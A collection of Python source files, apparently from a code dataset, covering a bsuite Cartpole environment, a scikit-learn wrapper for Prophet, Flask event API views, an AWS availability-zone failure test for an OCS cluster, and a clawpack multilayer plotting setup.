return specs.Array(shape=(1, 6), dtype=np.float32, name='state')
@property
def observation(self) -> np.ndarray:
"""Approximately normalize output."""
obs = np.zeros((1, 6), dtype=np.float32)
obs[0, 0] = self._state.x / self._x_threshold
obs[0, 1] = self._state.x_dot / self._x_threshold
obs[0, 2] = np.sin(self._state.theta)
obs[0, 3] = np.cos(self._state.theta)
obs[0, 4] = self._state.theta_dot
obs[0, 5] = self._state.time_elapsed / self._max_time
return obs
def bsuite_info(self):
return dict(raw_return=self._raw_return,
best_episode=self._best_episode)
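# --- Illustrative usage sketch (not part of the original bsuite file) ---
# Minimal interaction loop for the dm_env API described in the class
# docstring: reset to obtain the first TimeStep, then step with one of the
# three discrete actions until the episode ends. `_demo_rollout` is a
# hypothetical helper added here purely for illustration.
def _demo_rollout(num_steps: int = 100) -> float:
  env = Cartpole(seed=0)
  timestep = env.reset()
  total_reward = 0.
  for _ in range(num_steps):
    timestep = env.step(1)  # action 1 == 'stay'
    total_reward += timestep.reward or 0.
    if timestep.last():  # pole fell, cart left the table, or max_time hit
      timestep = env.reset()
  return total_reward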
|
bsuite/experiments/cartpole/cartpole.py
|
"""The Cartpole reinforcement learning environment."""
# Import all packages
import collections
from bsuite.experiments.cartpole import sweep
import dm_env
from dm_env import specs
import numpy as np
CartpoleState = collections.namedtuple(
'CartpoleState', ['x', 'x_dot', 'theta', 'theta_dot', 'time_elapsed'])
CartpoleConfig = collections.namedtuple(
'CartpoleConfig',
['mass_cart', 'mass_pole', 'length', 'force_mag', 'gravity']
)
def step_cartpole(action: int,
timescale: float,
state: CartpoleState,
config: CartpoleConfig) -> CartpoleState:
"""Helper function to step cartpole state under given config."""
# Unpack variables into "short" names for mathematical equation
force = (action - 1) * config.force_mag
cos = np.cos(state.theta)
sin = np.sin(state.theta)
pl = config.mass_pole * config.length
l = config.length
m_pole = config.mass_pole
m_total = config.mass_cart + config.mass_pole
g = config.gravity
# Compute the physical evolution
temp = (force + pl * state.theta_dot**2 * sin) / m_total
theta_acc = (g * sin - cos * temp) / (l * (4/3 - m_pole * cos**2 / m_total))
x_acc = temp - pl * theta_acc * cos / m_total
# Update states according to discrete dynamics
x = state.x + timescale * state.x_dot
x_dot = state.x_dot + timescale * x_acc
theta = np.remainder(
state.theta + timescale * state.theta_dot, 2 * np.pi)
theta_dot = state.theta_dot + timescale * theta_acc
time_elapsed = state.time_elapsed + timescale
return CartpoleState(x, x_dot, theta, theta_dot, time_elapsed)
class Cartpole(dm_env.Environment):
"""This implements a version of the classic Cart Pole task.
For more information see:
https://webdocs.cs.ualberta.ca/~sutton/papers/barto-sutton-anderson-83.pdf
The observation is a vector representing:
`(x, x_dot, sin(theta), cos(theta), theta_dot, time_elapsed)`
The actions are discrete ['left', 'stay', 'right']. Episodes start with the
pole close to upright. Episodes end when the pole falls, the cart falls off
the table, or the max_time is reached.
"""
def __init__(self,
height_threshold: float = 0.8,
x_threshold: float = 3.,
timescale: float = 0.01,
max_time: float = 10.,
init_range: float = 0.05,
seed: int = None):
# Setup.
self._state = CartpoleState(0, 0, 0, 0, 0)
self._reset_next_step = True
self._rng = np.random.RandomState(seed)
self._init_fn = lambda: self._rng.uniform(low=-init_range, high=init_range)
# Logging info
self._raw_return = 0.
self._best_episode = 0.
self._episode_return = 0.
# Reward/episode logic
self._height_threshold = height_threshold
self._x_threshold = x_threshold
self._timescale = timescale
self._max_time = max_time
# Problem config
self._cartpole_config = CartpoleConfig(
mass_cart=1.,
mass_pole=0.1,
length=0.5,
force_mag=10.,
gravity=9.8,
)
# Public attributes.
self.bsuite_num_episodes = sweep.NUM_EPISODES
def reset(self):
self._reset_next_step = False
self._state = CartpoleState(
x=self._init_fn(),
x_dot=self._init_fn(),
theta=self._init_fn(),
theta_dot=self._init_fn(),
time_elapsed=0.,
)
self._episode_return = 0
return dm_env.restart(self.observation)
def step(self, action):
if self._reset_next_step:
return self.reset()
self._state = step_cartpole(
action=action,
timescale=self._timescale,
state=self._state,
config=self._cartpole_config,
)
# Rewards only when the pole is central and balanced
is_reward = (np.cos(self._state.theta) > self._height_threshold
and np.abs(self._state.x) < self._x_threshold)
reward = 1. if is_reward else 0.
self._raw_return += reward
self._episode_return += reward
self._best_episode = max(self._episode_return, self._best_episode)
if self._state.time_elapsed > self._max_time or not is_reward:
self._reset_next_step = True
return dm_env.termination(reward=reward, observation=self.observation)
else: # continuing transition.
return dm_env.transition(reward=reward, observation=self.observation)
def action_spec(self):
return specs.DiscreteArray(dtype=np.int, num_values=3, name='action')
def observation_spec(self):
return specs.Array(shape=(1, 6), dtype=np.float32, name='state')
@property
def observation(self) -> np.ndarray:
"""Approximately normalize output."""
obs = np.zeros((1, 6), dtype=np.float32)
obs[0, 0] = self._state.x / self._x_threshold
obs[0, 1] = self._state.x_dot / self._x_threshold
obs[0, 2] = np.sin(self._state.theta)
obs[0, 3] = np.cos(self._state.theta)
obs[0, 4] = self._state.theta_dot
obs[0, 5] = self._state.time_elapsed / self._max_time
return obs
def bsuite_info(self):
return dict(raw_return=self._raw_return,
best_episode=self._best_episode)
| 0.924509 | 0.607809 |
from copy import deepcopy
from inspect import isclass, signature
import numpy as np
import pandas as pd
from fbprophet import Prophet
from sklearn.base import BaseEstimator
class SkProphet(Prophet):
DS = 'ds'
def __init__(
self,
sk_date_column=DS,
sk_yhat_only=True,
sk_extra_regressors=None,
prophet_kwargs=None,
):
"""Scikit learn compatible interface for FBProphet.
Parameters
----------
sk_date_column: str
Name of the column to use as date in Prophet.
sk_yhat_only: Boolean
True to return only the yhat from Prophet predictions.
False to return everything.
sk_extra_regressors: [] or [str] or [dict()]
List with extra regressors to use. The list can have:
* strings: column names (default prophet arguments for extra
regressors will be used).
* dicts: {name: *column_name*, prior_scale: _, standardize: _,
mode: _}
For more information see Prophet.add_regressors.
prophet_kwargs: dict
Keyword arguments to forward to Prophet.
"""
if sk_extra_regressors is None:
sk_extra_regressors = []
if prophet_kwargs is None:
prophet_kwargs = {}
super().__init__(**prophet_kwargs)
self.sk_date_column = sk_date_column
self.sk_yhat_only = sk_yhat_only
self.sk_extra_regressors = sk_extra_regressors
self.prophet_kwargs = prophet_kwargs
self._set_my_extra_regressors()
def fit(
self, X, y=None, copy=True, **fit_params
): # pylint: disable=arguments-differ
"""Scikit learn's like fit on the Prophet model.
Parameters
----------
X: pd.DataFrame
A dataframe with the data to fit.
It is expected to have a column with datetime values named as
*self.sk_date_column*.
y: None or str or (list, tuple, numpy.ndarray, pandas.Series/DataFrame)
The label values to fit. If y is:
- None: the column 'y' should be contained in X.
- str: the name of the column to use in X.
- list, tuple, ndarray, etc: the values to fit.
If the values have two dimensions (a matrix instead of a vector)
the first column will be used.
E.g.: [1, 3] -> [1, 3] will be used.
E.g.: [[1], [3]] -> [1, 3] will be used.
E.g.: [[1, 2], [3, 4]] -> [1, 3] will be used.
copy: Boolean
True to copy the input dataframe before working with it to avoid
modifying the original one.
            If False is provided, no defensive copy is made, so X may be
            modified in place (e.g. when renaming columns or adding the
            `y` column).
fit_params: keyword arguments
Keyword arguments to forward to Prophet's fit.
"""
if not isinstance(X, pd.DataFrame):
raise TypeError('Arg "X" passed can only be of pandas.DataFrame type.')
if copy:
X = X.copy()
if self.sk_date_column != self.DS and self.sk_date_column in X.columns:
X = X.rename({self.sk_date_column: self.DS}, axis=1)
if y is not None:
if isinstance(y, str) and y in X.columns:
X = X.rename({y: 'y'}, axis=1)
else:
X['y'] = self._as_np_vector(y)
return super().fit(X, **fit_params)
def predict(self, X, copy=True): # pylint: disable=arguments-differ
"""Scikit learn's predict (returns predicted values).
Parameters
----------
X: pandas.DataFrame
Input data for predictions.
copy: Boolean
True to copy the input dataframe before working with it to avoid
modifying the original one.
            If False is provided, no defensive copy is made, so X may be
            modified in place (e.g. when renaming the date column).
"""
if copy:
X = X.copy()
if self.sk_date_column != self.DS and self.sk_date_column in X.columns:
X = X.rename({self.sk_date_column: self.DS}, axis=1)
predictions = super().predict(X)
if self.sk_yhat_only:
predictions = predictions.yhat.values
return predictions
def get_params(self, deep=True):
"""Scikit learn's get_params (returns the estimator's params)."""
prophet_attrs = [
attr for attr in signature(Prophet.__init__).parameters if attr != 'self'
]
sk_attrs = [
attr for attr in signature(self.__init__).parameters if attr != 'self'
]
prophet_params = {a: getattr(self, a, None) for a in prophet_attrs}
sk_params = {a: getattr(self, a, None) for a in sk_attrs}
if deep:
sk_params = deepcopy(sk_params)
prophet_params = deepcopy(prophet_params)
sk_params['prophet_kwargs'].update(prophet_params)
return sk_params
def set_params(self, **params):
"""Scikit learn's set_params (sets the parameters provided).
        Note on Prophet keyword argument precedence:
        - If an argument is passed explicitly, that value is kept.
        - Otherwise, if it is provided inside a 'prophet_kwargs' dict, that value is kept.
        - Lastly, if it is not provided either way but is currently set, the value is not erased.
"""
sk_kws = [
attr for attr in signature(self.__init__).parameters if attr != 'self'
]
current_prophet_kws = getattr(self, 'prophet_kwargs', {})
explicit_prophet_kws = {}
args_passed_prophet_kws = {}
for attr, value in params.items():
if attr == 'prophet_kwargs':
explicit_prophet_kws = value
elif attr not in sk_kws:
args_passed_prophet_kws[attr] = value
else:
setattr(self, attr, value)
prophet_kws = current_prophet_kws
prophet_kws.update(explicit_prophet_kws)
prophet_kws.update(args_passed_prophet_kws)
for attr, value in prophet_kws.items():
setattr(self, attr, value)
setattr(self, 'prophet_kwargs', prophet_kws)
self._set_my_extra_regressors()
return self
def _set_my_extra_regressors(self):
"""Adds the regressors defined in self.sk_extra_regressors.
It is meant to be used at initialization.
"""
if self.extra_regressors:
self.extra_regressors = self.extra_regressors.__class__()
for regressor in self.sk_extra_regressors:
if isinstance(regressor, str):
self.add_regressor(regressor)
elif isinstance(regressor, dict):
self.add_regressor(**regressor)
else:
raise TypeError(
'Invalid extra_regressor in SkProphet.'
'Extra regressors must be strings or dicts with '
'{name: *column_name*, prior_scale: _, standardize: _, '
'mode: _}'
)
def _as_np_vector(self, y):
"""Ensures a list, tuple, pandas.Series, pandas.DataFrame
or numpy.ndarray is returned as a numpy.ndarray of dimension 1.
Parameters
----------
y: list, tuple, numpy.ndarray, pandas.Series, pandas.DataFrame
The object containing the y values to fit.
If y is multidimensional, e.g.: [[1, 2], [3, 4]], the first column
            will be returned as the y value; continuing the example: [1, 3].
Returns
-------
numpy.ndarray of dimension 1
The values as a numpy array of dimension 1.
"""
if isinstance(y, (list, tuple)):
y = np.asarray(y)
elif isinstance(y, (pd.Series, pd.DataFrame)):
y = y.values
if isinstance(y, np.ndarray):
if len(y.shape) > 1:
y = y[:, 0]
return y
    def __repr__(self):
        """Text representation of the object, for a nice display in the
        interpreter.
        """
        return (
            f'{self.__class__.__name__}('
            f'sk_date_column="{self.sk_date_column}", '
            f'sk_yhat_only={self.sk_yhat_only}, '
            f'sk_extra_regressors={self.extra_regressors}, '
            f'prophet_kwargs={self.prophet_kwargs})'
        )
__str__ = __repr__
class StepsSelectorEstimator(BaseEstimator):
def __init__(
self, estimator_class, amount_of_steps, estimator_kwargs=None, sort_col='date'
):
"""An estimator that only uses a certain amount of rows on fit.
Parameters
----------
estimator_class: Classer or Estimator Class or estimator instance
            Estimator class to use for fitting. If an estimator class is
            provided, it will be wrapped with a metaestimator.Classer; if an
            instance is provided, its class will be wrapped.
examples:
- Classer(sklearn.ensemble.RandomForestRegressor)
- sklearn.ensemble.RandomForestRegressor
- sklearn.ensemble.RandomForestRegressor()
amount_of_steps: int
The amount of time steps to use for training.
sort_col: str
Name of the column which will be used for sorting if X is a
dataframe and has the column.
estimator_kwargs: dict
Keyword arguments to initialize EstimatorClass
E.g.:
> StepsSelectorEstimator(RandomForestRegressor(), 100)
"""
if estimator_kwargs is None:
estimator_kwargs = {}
self.amount_of_steps = amount_of_steps
self.sort_col = sort_col
self.estimator_kwargs = estimator_kwargs
self.estimator_class = Classer.from_obj(estimator_class)
self._estimator = self.estimator_class.new(**self.estimator_kwargs)
def fit(self, X, y):
"""Fits self.estimator only to the last self.amount_of_steps rows.
Tries to sort X first.
Parameters
----------
X: pd.DataFrame
A dataframe to fit.
y: vector like
Labels
"""
if self.sort_col in X.columns:
X = X.sort_values(self.sort_col, axis=0)
index_to_drop = X.iloc[: -self.amount_of_steps].index
y = y.drop(index_to_drop).reset_index(drop=True)
X = X.drop(index_to_drop).reset_index(drop=True)
self._estimator.fit(X, y)
return self
def predict(self, X):
"""Scikit's learn like predict."""
return self._estimator.predict(X)
def get_params(self, deep=True):
"""Get estimator params."""
kwargs = self.estimator_kwargs
if deep:
kwargs = deepcopy(kwargs)
return {
'estimator_class': self.estimator_class,
'amount_of_steps': self.amount_of_steps,
'sort_col': self.sort_col,
'estimator_kwargs': kwargs,
}
def set_params(self, **params):
"""Sets the estimator's params to \*\*params.""" # pylint: disable=anomalous-backslash-in-string
self.estimator_class = Classer.from_obj(params['estimator_class'])
self.amount_of_steps = params['amount_of_steps']
self.sort_col = params['sort_col']
self.estimator_kwargs = params['estimator_kwargs']
self._estimator = self.estimator_class.new(**self.estimator_kwargs)
return self
def __repr__(self): # pylint: disable=signature-differs
"""Text representation of the object to look it nicely in the
interpreter.
"""
return (
f'{self.__class__.__name__}('
f'estimator_class={Classer.from_obj(self.estimator_class)}, '
f'amount_of_steps={self.amount_of_steps}, '
f'estimator_kwargs={self.estimator_kwargs})'
)
__str__ = __repr__
class Classer:
def __init__(self, EstimatorClass):
"""Wraps an EstimatorClass to avoid sklearn.base.clone exploting when
called against an EstimatorClass during grid search of metaestimators.
Parameters
----------
EstimatorClass: class
A Sklearn compatible estimator class.
"""
self._class = EstimatorClass
def new(self, *args, **kwargs):
"""Returns a new instance of the wrapped class initialized with the
args and kwargs.
"""
return self._class(*args, **kwargs)
@classmethod
def from_obj(cls, obj):
"""Initializes a new classer from an object, which can be another
Classer, a class or an instance.
"""
if isinstance(obj, Classer):
return obj
elif isclass(obj):
return Classer(obj)
else:
return Classer(obj.__class__)
def __eq__(self, other):
"""Equality checks inner class wrapped."""
return self.__class__ == other.__class__ and self._class == other._class
def __repr__(self):
"""Text representation of the object to look it nicely in the
interpreter.
"""
return f'{self.__class__.__name__}({self._class.__name__})'
__str__ = __repr__
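# --- Illustrative usage sketch (not part of the original muttlib module) ---
# Hedged example of the wrappers above: an SkProphet configured with extra
# regressors given both as a plain column name and as a dict, and a
# StepsSelectorEstimator wrapping a scikit-learn regressor through Classer.
# The column names ('temperature', 'holiday') and `_demo_estimators` itself
# are hypothetical; `RandomForestRegressor` comes from scikit-learn, and
# actually fitting SkProphet would require a working fbprophet installation.
def _demo_estimators():
    from sklearn.ensemble import RandomForestRegressor

    model = SkProphet(
        sk_date_column='date',
        sk_yhat_only=True,
        sk_extra_regressors=[
            'temperature',                             # Prophet defaults
            {'name': 'holiday', 'prior_scale': 10.0},  # custom arguments
        ],
        prophet_kwargs={'daily_seasonality': True},
    )
    # set_params merges explicit Prophet kwargs into prophet_kwargs:
    model.set_params(weekly_seasonality=False)

    selector = StepsSelectorEstimator(
        RandomForestRegressor,
        amount_of_steps=30,
        estimator_kwargs={'n_estimators': 10},
        sort_col='date',
    )
    return model.get_params(deep=True), selector.get_params(deep=True)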
|
muttlib/forecast.py
|
| 0.847274 | 0.396944 |
from datetime import timedelta
from webargs import fields
from . import BaseView, use_args, use_kwargs
from ..models.event import Event as EventModel
from ..schemas.event import Event as EventSchema, EventMatch
from .utils import get_or_404
eventlist_args = {
"fromdate": fields.Date(required=False),
"todate": fields.Date(required=False),
}
class EventListView(BaseView):
# pylint: disable=no-self-use
route_base = "/events"
@use_kwargs(eventlist_args, location="query")
def get(self, fromdate, todate):
if fromdate and todate:
matches = EventModel.get_between(fromdate, todate)
return EventMatch.jsonify(matches), 200
objects = EventModel.query_all().all()
return EventSchema.jsonify(objects), 200
@use_args(EventSchema(), location="json")
def post(self, args):
obj = EventModel.create(**args)
return EventSchema.jsonify(obj), 201
class EventItemView(BaseView):
# pylint: disable=no-self-use
route_base = "/events/<int:id>"
def get(self, id): # pylint: disable=redefined-builtin
obj = get_or_404(EventModel, id)
return EventSchema.jsonify(obj), 200
@use_args(EventSchema(), location="json")
def put(self, args, id): # pylint: disable=redefined-builtin
obj = get_or_404(EventModel, id)
obj.update(**args)
return EventSchema.jsonify(obj), 200
def delete(self, id): # pylint: disable=redefined-builtin
obj = get_or_404(EventModel, id)
obj.delete()
return "", 204
repeat_args = {
"days": fields.Int(required=True),
}
class EventRepeatView(BaseView):
# pylint: disable=no-self-use
route_base = "/events/<int:id>/repeat"
@use_kwargs(repeat_args, location="json")
def post(self, id, days): # pylint: disable=redefined-builtin
obj = get_or_404(EventModel, id)
if obj.repeat is not None:
return "", 400
dt = obj.date + timedelta(days=days)
new_obj = EventModel.create(name=obj.name, icon=obj.icon, date=dt)
return EventSchema.jsonify(new_obj), 201
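# --- Illustrative sketch (not part of the original view module) ---
# The repeat endpoint above clones an event `days` days after its original
# date (answering 201 with the new event, or 400 when `repeat` is already
# set). The date arithmetic is plain datetime; `_repeat_date` is a
# hypothetical helper shown only for illustration.
def _repeat_date(original_date, days: int):
    return original_date + timedelta(days=days)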
|
friday/views/event.py
|
| 0.610337 | 0.070688 |
import logging
import random
import pytest
from ocs_ci.framework.pytest_customization.marks import aws_platform_required
from ocs_ci.framework.testlib import ManageTest, tier4, bugzilla
from ocs_ci.ocs.exceptions import CommandFailed
from tests import sanity_helpers
logger = logging.getLogger(__name__)
@tier4
@pytest.mark.polarion_id("OCS-1287")
@aws_platform_required
@bugzilla('1754287')
class TestAvailabilityZones(ManageTest):
"""
    Test availability zone failure.
    Test stages:
    1. Select an availability zone
    2. In this availability zone, back up the instances' original security groups
    3. Block the availability zone by attaching a security group with no permissions
    4. Validate cluster functionality and health:
       4a. health check - warning or error
       4b. create cephfs, create rbd, create pvc (validate_cluster)
    5. Restore availability zone access
    6. Validate cluster functionality and health
"""
@pytest.fixture(autouse=True)
def init_sanity(self):
"""
init Sanity() object
"""
self.sanity_helpers = sanity_helpers.Sanity()
@pytest.fixture()
def teardown(self, request, ec2_instances, aws_obj):
def finalizer():
current_sg = aws_obj.store_security_groups_for_instances(self.instances_in_az)
if self.original_sgs != current_sg:
aws_obj.restore_instances_access(self.security_group_id, self.original_sgs)
logger.info(f"Access to EC2 instances {self.instances_in_az} has been restored")
if self.security_group_id in aws_obj.get_all_security_groups():
logger.info(f"Deleting: {self.security_group_id}")
aws_obj.delete_security_group(self.security_group_id)
request.addfinalizer(finalizer)
def test_availability_zone_failure(
self, aws_obj, ec2_instances, pvc_factory, pod_factory, teardown
):
"""
Simulate AWS availability zone failure
"""
# Select instances in randomly chosen availability zone:
self.instances_in_az = self.random_availability_zone_selector(aws_obj, ec2_instances)
logger.info(f"AZ selected, Instances: {self.instances_in_az} to be blocked")
# Storing current security groups for selected instances:
self.original_sgs = aws_obj.store_security_groups_for_instances(self.instances_in_az)
logger.info(f"Original security groups of selected instances: {self.original_sgs}")
# Blocking instances:
self.security_group_id = self.block_aws_availability_zone(aws_obj, self.instances_in_az)
logger.info(f"Access to EC2 instances {self.instances_in_az} has been blocked")
# Check cluster's health, need to be unhealthy at that point
assert not self.check_cluster_health(), (
"Cluster is wrongly reported as healthy."
"EC2 Instances {self.instances_in_az} are blocked"
)
# Create resources
logger.info("Trying to create resources on un-healthy cluster")
self.sanity_helpers.create_resources(pvc_factory, pod_factory)
logger.info("Resources Created")
# Delete resources
logger.info("Trying to delete resources on un-healthy cluster")
self.sanity_helpers.delete_resources()
logger.info("Resources Deleted")
# Restore access for blocked instances
aws_obj.restore_instances_access(self.security_group_id, self.original_sgs)
logger.info(f"Access restores")
# Check cluster's health, need to be healthy at that point
assert self.check_cluster_health(), "Cluster is unhealthy"
def random_availability_zone_selector(self, aws_obj, ec2_instances):
"""
Get all instances within random availability zone
Args:
aws_obj (obj): aws.AWS() object
ec2_instances (dict): cluster ec2 instances objects
Returns:
list: instances_in_az
"""
random_az_selector = random.choice(list(ec2_instances.keys()))
random_az_selected = aws_obj.get_availability_zone_id_by_instance_id(random_az_selector)
instances_in_az = list()
for instance in ec2_instances.keys():
az = aws_obj.get_availability_zone_id_by_instance_id(instance)
if random_az_selected == az:
instances_in_az.append(instance)
return instances_in_az
def block_aws_availability_zone(self, aws_obj, instances_in_az):
"""
1. get vpc_id
2. create security group in this vpc
3. block availability zone by using "append_security_group"
Args:
aws_obj (obj): aws.AWS() object
instances_in_az (list): ec2_instances within selected availability zone
Returns:
security_group_id (str): Newly created security id without access permissions
"""
group_name = "TEST_SEC_GROUP"
dict_permissions = {'IpProtocol': 'tcp',
'FromPort': 80,
'ToPort': 80,
'IpRanges': [{'CidrIp': '1.1.1.1/32'}]}
vpc_id = aws_obj.get_vpc_id_by_instance_id(instances_in_az[0])
security_group_id = aws_obj.create_security_group(group_name, dict_permissions, vpc_id)
aws_obj.block_instances_access(security_group_id, instances_in_az)
return security_group_id
def check_cluster_health(self):
try:
self.sanity_helpers.health_check()
return True
except CommandFailed as e:
if "Unable to connect to the server" in str(e):
logger.warning(f"{e}, Cluster is not healthy")
return False
|
tests/manage/cluster/nodes/test_az_failure.py
|
| 0.619932 | 0.290591 |
from __future__ import absolute_import
from __future__ import print_function
import os
import numpy as np
import matplotlib.pyplot as plt
from clawpack.visclaw import geoplot, gaugetools
import clawpack.clawutil.data as clawutil
import clawpack.amrclaw.data as amrclaw
import clawpack.geoclaw.data
import clawpack.geoclaw.multilayer.plot as ml_plot
def setplot(plotdata=None, bathy_location=0.15, bathy_angle=0.0,
bathy_left=-1.0, bathy_right=-0.2):
"""Setup the plotting data objects.
Input: plotdata, an instance of pyclaw.plotters.data.ClawPlotData.
Output: a modified version of plotdata.
returns plotdata object
"""
if plotdata is None:
from clawpack.visclaw.data import ClawPlotData
plotdata = ClawPlotData()
# Load data from output
clawdata = clawutil.ClawInputData(2)
clawdata.read(os.path.join(plotdata.outdir, 'claw.data'))
multilayer_data = clawpack.geoclaw.data.MultilayerData()
multilayer_data.read(os.path.join(plotdata.outdir, 'multilayer.data'))
def transform_c2p(x, y, x0, y0, theta):
return ((x+x0)*np.cos(theta) - (y+y0)*np.sin(theta),
(x+x0)*np.sin(theta) + (y+y0)*np.cos(theta))
def transform_p2c(x, y, x0, y0, theta):
return (x*np.cos(theta) + y*np.sin(theta) - x0,
-x*np.sin(theta) + y*np.cos(theta) - y0)
# Setup bathymetry reference lines
with open(os.path.join(plotdata.outdir, "bathy_geometry.data"), 'r') \
as bathy_geometry_file:
bathy_location = float(bathy_geometry_file.readline())
bathy_angle = float(bathy_geometry_file.readline())
x = [0.0, 0.0]
y = [0.0, 1.0]
x1, y1 = transform_c2p(x[0], y[0], bathy_location, 0.0, bathy_angle)
x2, y2 = transform_c2p(x[1], y[1], bathy_location, 0.0, bathy_angle)
if abs(x1 - x2) < 10**-3:
x = [x1, x1]
y = [clawdata.lower[1], clawdata.upper[1]]
else:
m = (y1 - y2) / (x1 - x2)
x[0] = (clawdata.lower[1] - y1) / m + x1
y[0] = clawdata.lower[1]
x[1] = (clawdata.upper[1] - y1) / m + x1
y[1] = clawdata.upper[1]
ref_lines = [((x[0], y[0]), (x[1], y[1]))]
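    # Illustrative note (not part of the original setplot): transform_c2p maps
    # computational to physical coordinates (shift by (x0, y0), then rotate by
    # theta) and transform_p2c is its inverse, so a round trip returns the
    # input, e.g.
    #   xc, yc = transform_p2c(
    #       *transform_c2p(0.1, 0.2, bathy_location, 0.0, bathy_angle),
    #       bathy_location, 0.0, bathy_angle)
    #   # (xc, yc) == (0.1, 0.2) up to floating-point error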
plotdata.clearfigures()
plotdata.save_frames = False
# ========================================================================
# Generic helper functions
def pcolor_afteraxes(current_data):
bathy_ref_lines(current_data)
def contour_afteraxes(current_data):
axes = plt.gca()
pos = -80.0 * (23e3 / 180) + 500e3 - 5e3
axes.plot([pos, pos], [-300e3, 300e3], 'b',
[pos-5e3, pos-5e3], [-300e3, 300e3], 'y')
wind_contours(current_data)
bathy_ref_lines(current_data)
def profile_afteraxes(current_data):
pass
def bathy_ref_lines(current_data):
axes = plt.gca()
for ref_line in ref_lines:
x1 = ref_line[0][0]
y1 = ref_line[0][1]
x2 = ref_line[1][0]
y2 = ref_line[1][1]
axes.plot([x1, x2], [y1, y2], 'y--', linewidth=1)
# ========================================================================
# Axis limits
xlimits = [-0.5, 0.5]
ylimits = [-0.5, 0.5]
eta = [multilayer_data.eta[0], multilayer_data.eta[1]]
top_surface_limits = [eta[0] - 0.03, eta[0] + 0.03]
internal_surface_limits = [eta[1] - 0.015, eta[1] + 0.015]
top_speed_limits = [0.0, 0.1]
internal_speed_limits = [0.0, 0.03]
# ========================================================================
# Surface Elevations
plotfigure = plotdata.new_plotfigure(name='Surface')
plotfigure.show = True
plotfigure.kwargs = {'figsize': (14, 4)}
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Surface'
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_surface_elevation(plotaxes,1,bounds=top_surface_limits)
# ml_plot.add_surface_elevation(plotaxes,1,bounds=[-0.06,0.06])
# ml_plot.add_surface_elevation(plotaxes,1)
ml_plot.add_land(plotaxes, 1)
# Bottom surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Internal Surface'
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
# ml_plot.add_surface_elevation(plotaxes,2,bounds=[-300-0.5,-300+0.5])
ml_plot.add_surface_elevation(plotaxes,2,bounds=internal_surface_limits)
# ml_plot.add_surface_elevation(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
# ========================================================================
# Depths
# ========================================================================
plotfigure = plotdata.new_plotfigure(name='Depths', figno=42)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,4)}
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Layer Depth'
plotaxes.axescmd = 'subplot(1,2,1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_layer_depth(plotaxes,1,bounds=[-0.1,1.1])
ml_plot.add_land(plotaxes, 1)
# Bottom surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Bottom Layer Depth'
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_layer_depth(plotaxes,2,bounds=[-0.1,0.7])
ml_plot.add_land(plotaxes, 2)
# ========================================================================
# Water Speed
plotfigure = plotdata.new_plotfigure(name='speed')
plotfigure.show = True
plotfigure.kwargs = {'figsize': (14, 4)}
# Top layer speed
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Currents - Top Layer'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_speed(plotaxes, 1, bounds=top_speed_limits)
ml_plot.add_land(plotaxes, 1)
# Bottom layer speed
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Currents - Bottom Layer'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.afteraxes = pcolor_afteraxes
# add_speed(plotaxes,2,bounds=[0.0,1e-10])
ml_plot.add_speed(plotaxes,2,bounds=internal_speed_limits)
# add_speed(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
# Individual components
plotfigure = plotdata.new_plotfigure(name='speed_components',figno=401)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,14)}
# Top layer
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "X-Velocity - Top Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,1)'
plotaxes.afteraxes = pcolor_afteraxes
# add_x_velocity(plotaxes,1,bounds=[-1e-10,1e-10])
ml_plot.add_x_velocity(plotaxes,1)
ml_plot.add_land(plotaxes, 1)
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "Y-Velocity - Top Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,2)'
plotaxes.afteraxes = pcolor_afteraxes
# add_y_velocity(plotaxes,1,bounds=[-0.000125,0.000125])
ml_plot.add_y_velocity(plotaxes,1)
ml_plot.add_land(plotaxes, 1)
# Bottom layer
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "X-Velocity - Bottom Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,3)'
plotaxes.afteraxes = pcolor_afteraxes
# add_x_velocity(plotaxes,2,bounds=[-1e-10,1e-10])
ml_plot.add_x_velocity(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "Y-Velocity - Bottom Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,4)'
plotaxes.afteraxes = pcolor_afteraxes
# add_y_velocity(plotaxes,2,bounds=[-0.8e-6,.8e-6])
ml_plot.add_y_velocity(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
# ========================================================================
# Profile Plots
# Note that these are not currently plotted by default - set
    # `plotfigure.show = True` if you want this to be plotted
